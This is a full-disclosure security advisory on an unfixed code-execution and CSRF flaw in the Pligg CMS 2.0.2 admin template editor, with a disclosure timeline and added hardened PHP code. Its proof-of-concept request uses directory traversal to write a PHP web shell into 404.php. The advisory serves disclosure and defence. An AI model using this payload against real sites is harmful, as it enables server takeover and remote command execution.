Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Code Execution & CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

The file editor allows editing .tpl files stored in the templates directory.

However, the file editor is vulnerable to directory traversal when saving
files: it does not check the submitted filename against a whitelist of allowed
files, and it does not check the file extension either. Because of this, it is
possible to gain code execution.

Admin credentials are required to access the file editor, but the request does
not have CSRF protection, so an attacker can gain code execution by getting the
admin to visit a website they control while logged in.

3. Proof of Concept

POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes

4. Solution

This issue was not fixed by the vendor.
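As an added illustration (not Pligg's code and not part of this advisory), a hardened version of the template save handler in PHP that adds the three checks the description says are missing: a CSRF token, a whitelist of existing .tpl files with an extension check, and confinement of the write to the templates directory. The parameter names the_file2 and updatedfile are taken from the proof of concept request; the session token name csrf_token and the ../templates path are assumptions.

```php
<?php
// Added example, not Pligg's own code. Hardened save handler for a template
// editor. Assumptions: templates live in ../templates relative to this file,
// and the edit form embedded $_SESSION['csrf_token'] as a hidden field.
declare(strict_types=1);

function verify_csrf_token(?string $submitted): bool
{
    // Constant-time comparison against the token issued with the form.
    return !empty($_SESSION['csrf_token']) && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Returns the canonical path of an allowed template, or null if the
// submitted name fails any of the checks the advisory says were missing.
function resolve_template_path(string $templatesDir, string $name): ?string
{
    // Extension check plus a strict character set: this rejects "..", "/",
    // "\", NUL bytes and URL-decoded traversal sequences in one step.
    if (!preg_match('/^[A-Za-z0-9_-]+\.tpl$/', $name)) {
        return null;
    }
    // Whitelist: only files that already exist in the templates directory
    // may be overwritten; the editor never creates new files.
    $allowed = array_map('basename', glob($templatesDir . '/*.tpl') ?: []);
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the target is still inside
    // the templates directory (catches symlinks pointing elsewhere).
    $base = realpath($templatesDir);
    $path = realpath($templatesDir . '/' . $name);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

session_start();
if (!verify_csrf_token($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}
$path = resolve_template_path(__DIR__ . '/../templates', (string)($_POST['the_file2'] ?? ''));
if ($path === null) {
    http_response_code(400);
    exit('Request rejected: file is not an editable template');
}
file_put_contents($path, (string)($_POST['updatedfile'] ?? ''), LOCK_EX);
```

With these checks the traversal value from the proof of concept is rejected by the filename pattern before any filesystem access, and a forged cross-site request fails on the token check regardless of the filename.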

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html